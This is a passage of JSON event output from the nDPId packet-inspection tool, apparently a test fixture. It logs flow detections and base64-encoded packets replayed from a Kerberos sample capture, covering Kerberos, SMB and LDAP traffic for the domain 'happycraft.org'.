ejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjoWrS7jR3\/ZxrmkklAr5M\/UVPgZBz\/I0MBRDSrLAPTWRtuq1ZhbBTvDmh4JfIoeW\/NN+j\/BIs99fVl1IARv5kJzlvsrT0oz2PdU+R8Rl10wOzwJfT7yBOJecNjJCW1XhiL9p6LojffFaim+4jvn\/X89SbhRBqPbpCCF+yHmow+h4iZkD+HM6Jz3YsaIdiuQwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44s3moBTADAgES"} +00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} +02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337931220,"pkt":"AAgCHEeupB9ywglqCABFAAXME4FAAIAGeLmsEAgIrBAIyQBYwBgu4uDhNU2NClAYAQBUPQAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9aIPBwtNxkshczHziSeGRCcSiSC82vdTNNxZoZEqctTILmi\/cPiWo2kj2ZowTM5BfoTzgngU5zy1dblxSYtNNDo790fqKeln68pSwduOA5ekfZ2omIpLyTKi1Uzi5unXScqqLz0hKSsn\/40+2FcuWZE3ZvPuCmZ8SKPEnuc921KBrNqOj\/0DryAdSyI8er0AkE463j84WxyAtyNQDKDrp2ez6929oR6Rx5hbvL8GdKQY9jCLD2rnICMW89Hj9rOupV1OeH78XxxB7MSKm499oGFFneF9SM8YJwXSSMV673PLXubFj6DMrikD2G0Sl6xic8MhWvEbY+QDRNnfGPZAJvMaahqCk8wVuJCt+fkFop+b4toNRK\/McSX15qS4Oue1FamxPlWb8yeZyA7zxXMdyv\/9YdFl51KW6DMdV\/gNQhWVbNsnpHVbk+dZ3hmZuA13vS+pCaVgYWcY8TsTrrqDHUdvkhYH5y6bQXhaba0hTe8Bpqjtkm6\/RTu4J\/\/NKiUQMb9AOVNXKtDTvIFCVxCzbgDhWofcnihAdfiq3GVUSfoJVIjvbiKN6rurAhxZ5G7eeGZ0k0F7hodA7NNCDg1db\/i3Z0nn0sEe0z7aNhzE0ribx16c5Vcg7SzYKcbmYr2SOlrqyDG2wBIue4c+yHf8w4ERFzFfLLBAoUF6TY9mRoNRbKB\/qSAwbDd52vGpnn87rIVg\/QNGVIwMeb1KKPfdaC4wum+6\/FhZgWd0DbrZEhIXl\/8HN6zG+3ywmGFdeC2DFCmO4dETOrfkL6fl3T\/7ku0etROu1j+k26SXEG6Gge01yPUKju51MrjdtHnDZ1Ss42MB0XlUT6U6S5TlEIP\/8k9d0krm1cn0oRERln+NBIaJS\/B2711LZddv4tje7ItSqfXLacjoI7g80JWdXjf4l7SPcZiNeEbp1dMmXrQFZcbRN17kosEr4Tm2W4friYde8+zbAKqoXvVJXbnxAUwEVAGcV\/iPptIl\/xW9mtB0WPhDmkKXm2SfL9rih8OBbowoKkOmIJqQw8CRJRncVK0szyJok+ajlBHDiJgpcZUT8EmfmEr0qJ0qoMeuCqxs8Kf3IstAtgMR7lMBZda98WMq0J06Prxf9X\/7Sw5XHFF0Ihx2VyWiVN3DmzgADoDdivNlyaD8+Octjfvk+ZwiZGCsRMD1d7AL6HjQzrju4nysDHJIjeaKR52nWtCWAZ87qog1mDH+qjQPdMGkDr1FGrVbBXAZcR0K17tOKTw9bgQg9LvLMWeDMDNCEwvA8GHdr\/fAsBPK3PDKVyht8oNdhjar8xKOZRvwzCOpoIBJjCCASKgAwIBEqKCARkEggEVYp6jTcDi\/gYVd9SDuEsi2VccBape1lXgcuGoeWG1ePxV5NidfJvDEi3F2VmdD04JFUaFb\/GRqNe9F8xWyy86xiJ3eKyJgAfyG7DDQnnFCeKC++4ORaBUkKnIeWwsFqQxh0aL1BrdknGP8u06G6P95r9esj7jUPDXQ1D0+jbs1WpWssKqZMQfUgV0eg9FoEGdVPsUmgNbZN2YPPrxhZ6CEgNOIC\/5aj8NqGMkPPX6xfYF4tbD74dZ3EfC4ry5KcIxNVYXU179as2C\/cihpEMrX8yiZtM91awDzQYUMPKt3\/3WSS96ycQo00pex7Pc1Jh3j49Cr5ckyWXD9SUXbCcOpUpip4\/Jz5Hvsliozjm5inKwUIBTJQ=="} +00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931220,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337931220,"pkt":"pB9ywglqAAgCHEeuCABFAAELAJhAAIAGkGOsEAjJrBAICMAWAb2ZMOb++YgxIFAYAP+McAAAQFskZ7b1ZYO5\/CuVOTe3ZqHs3nhqe1KXhnlBtJ\/qDgyo+sduQpC\/WLkmAdUvTJdV+CtGiwLoGf3Uio50ZE6gilnFEbzLLhzMIw4gwhRvlYwapNctw4G2EkpKfWO1MgMQ0yTGVxtfwAuP0ouYkDi\/6FI97AzDGvp\/R2LK19PAI403fVWk1Cbb2O\/YPOGH5a8hHowuR6tT8UugHDdGGl\/fWl8Wk4rCdi\/3gOYAhRVI6o2ZOHpv4GeBlLgJ6L2WL35O3jhh2e2dr0Fkd\/WG3ET2QLw9x3WRfncFn29f8nOqAUQDRH0="} +00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1549337931221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337931221,"pkt":"AAgCHEeupB9ywglqCABFAAEsE4VAAIAGfVWsEAgIrBAIyQG9wBb5iDEgmTDn4VAYAP9zWgAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABdAAAAAAQAAPvWvNgjH\/I48OPxOa5H7a4JAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUswX\/mwh6g2ztwHi8\/dTRtvFzo0LVENq7tttT0JwVpKoIxijjsysss5HuCbI3DQGU7C0ILmrl+8phtVtu+2vBMSA9FKWe75R\/a+ST6oEaoDrDjzWfPqdU4xUCgD\/zK6J0O4Dsk+rO8nhy4LUmk="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937690,"flow_last_seen":1549337937690,"flow_idle_time":7560000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337937690,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1549337937690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337937690,"pkt":"pB9ywglqAAgCHEeuCABFAAEyAM1AAIAGkAesEAjJrBAICMAbAYXq\/lHZFzDO61AYAQB3VwAADK3yhyWG\/w4ePjAcLdmQD9l5KJpA6NxzQuCtaFM+te5CWXRB5sUkdKJyUVp4kqyFJvIav1zvlLEwv\/M6QDvIyPip6cO\/Y7DDZ55OmD6IlKO8Nx5lANmfdaxcK4l74ZAlM45v2cQu8OV3yuWKq5L2jtnHunCltg9I9Mqjq93VmxUc7poK8vfSfY1YgBhAmlp0cXMsoyIbcEQodelj3wLBZ2oxItwV78GGNt7TlfW6joQ5wfkj6ZEyRFJn0CVihbNqYYKxBD44uauIJQKkPsQlzXsxooh9lhiWoZtuh5F2\/1LO7drek9zYg6pqUFpyhpL3WcFxh3R7Uuv9RQ5CYfOoVItdeOxn2w53bU0="} +00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1549337937691,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937691,"pkt":"AAgCHEeupB9ywglqCABFAAD6E5tAAIAGfXGsEAgIrBAIyQGFwBsXMM7r6v5S41AYAQDOWAAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1JH5VWFTlwrbTZZZgbjZtW4QY+VaIr2rFT9\/AbDkv31Idx3xo24Bwzqv50t5zQXx7Id1H\/iLYt+nRqN0NWzCDJwnAfwcbOTGF30f3qnaqB+vDQ9EhQX38cpSy926C3lIc0Vkhc+VaaHdh510+B"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937700,"flow_last_seen":1549337937700,"flow_idle_time":7560000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337937700,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1549337937700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337937700,"pkt":"pB9ywglqAAgCHEeuCABFAAEyANVAAIAGj\/+sEAjJrBAICMAcAYWCU2zwSN6TcFAYAQDS2QAAEgduSF05n8MFVjy4LWbkIsui7POF\/jI0fgAi3\/kn4+lZJrv4uo1Xj0IHKshBaLfyrICuzZtbBAFYjLvQz7y8gyRTfkwzadmnUFntTq1Eam1s4n2Qhfn1fuSUa5DAR1i941DEujmYu8fTZX3tp1hllqkxXisHcqSEIi8W9weLGXgpYEZYoErMkYejHKEeDmPCwQO6JC7sDmP8cAErQb7Rc88wLF4lFI7xOIE4FiH\/05afA1w9V5d1P2yDaGB6bADs\/c2xi7QKQuP+FixF4gof0ovK0nwq\/y7Hd27V4SQ4qHRNlXJex92QoEPhio00QFq1bLTnuvdcqFYcMu\/6\/tRVEcFKp0ezr7WF5MI="} +00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1549337937701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937701,"pkt":"AAgCHEeupB9ywglqCABFAAD6E6JAAIAGfWqsEAgIrBAIyQGFwBxI3pNwglNt+lAYAQCvQgAAMIQAAADMAgEKYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG2EupGhqTVA+Kxm5vIdkbfFjlPoe8DmjpF\/p2I3j7EwFjqQzavz5jy+cGzZKn09a9y0dyj\/mpeHcqpjjORB3KYfxKGHrDmiKKSYiCwqx86ee7rLKiQPX2z3RSwNa4fWz8uAjgw+I5CkXYbP6rNu"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00776{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337937703,"pkt":"pB9ywglqAAgCHEeuCABFAAEXANlAAIAGkBasEAjJrBAICMAdAFjHhcaiuhdcXlAYAQCv5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBFIcW1KoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} +00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337937703,"pkt":"AAgCHEeupB9ywglqCABFAAE+E6VAAIAGfSOsEAgIrBAIyQBYwB26F1xex4XHkVAYAQDp0AAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg1NlqlBQIDBJWNpgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} +00731{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337937724,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAN1AAIAGj8KsEAjJrBAICMAeAFgo\/29go\/Vk0VAYAQAVQgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4EwWkoanvLUiVA5eu8uG72\/EPy4+eHAiK9HbftleuqZ7DwBR\/wY3Sc5USTXPr6SJXdlLH8zfIE5MwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLSk9ITlNPTi1QQySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEUhxbUqgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} +00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337937724,"pkt":"AAgCHEeupB9ywglqCABFAACYE6pAAIAGfcSsEAgIrBAIyQBYwB6j9WqFKP9wn1AYAQCbeQAAeBxjGZR555TmhlGtfWdB3hqYo6lYswe6vKpNUcrN1M7KGcxMIdPLYhZ04dECjGI6ypolTWuvt884Bi2lq0pIFbZFVKD3x\/BnUesSWAB9L0qg+5NPzwAEggckaZSGKHdd5sXD0ux4MNvoyw986qY1Nw=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937725,"flow_last_seen":1549337937725,"flow_idle_time":7560000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":1,"thread_ts_msec":1549337937725,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1549337937725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1549337937725,"pkt":"pB9ywglqAAgCHEeuCABFAAB4AONAAIAGkKusEAjJrBAICMAfAFi1TK\/3YmHJT1AYAQDj2wAAbj2wbk+derrxO0c0pxRSdruhR6\/j4Ui\/xNsBa8OfbfRkbAwdywbQynHUORFcFH8maukxsoLa+OhvD2a5+zDPKPlneJ\/sg2b\/GuIvr5ZD3Bg="} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1549337937726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1549337937726,"pkt":"AAgCHEeupB9ywglqCABFAABQE7BAAIAGfgasEAgIrBAIyQBYwB9iYc8DtUywR1AYAQDGTwAA4zLECSz5GZPNqNSL4T5BMx8WrZoQ8TiJymulR2VkZN3O1rD+5YXABg=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337940431,"flow_last_seen":1549337940431,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337940431,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1549337940431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337940431,"pkt":"pB9ywglqAAgCHEeuCABFAACxAPpAAIAGkFusEAjJrBAICMAiAFjJGNiQqlyd6VAYAQDPPQAAiJisSNul39yNkXIaZ7I9abKKHsFn\/6nUnlpuYlwP2aMvOAIHPA5TwBaAhiWq+tFyYupNZpDDILw6OTtdBUx9AScUIqcHtp8iuHt0kMVzTn\/4u2MWOJ3B5oBzCaRbB4JGSnxRjDJCJirb6nGFgBI0LOLujBAlXiGb5mYfdXtWDkYlEBJfjMNCAaw="} 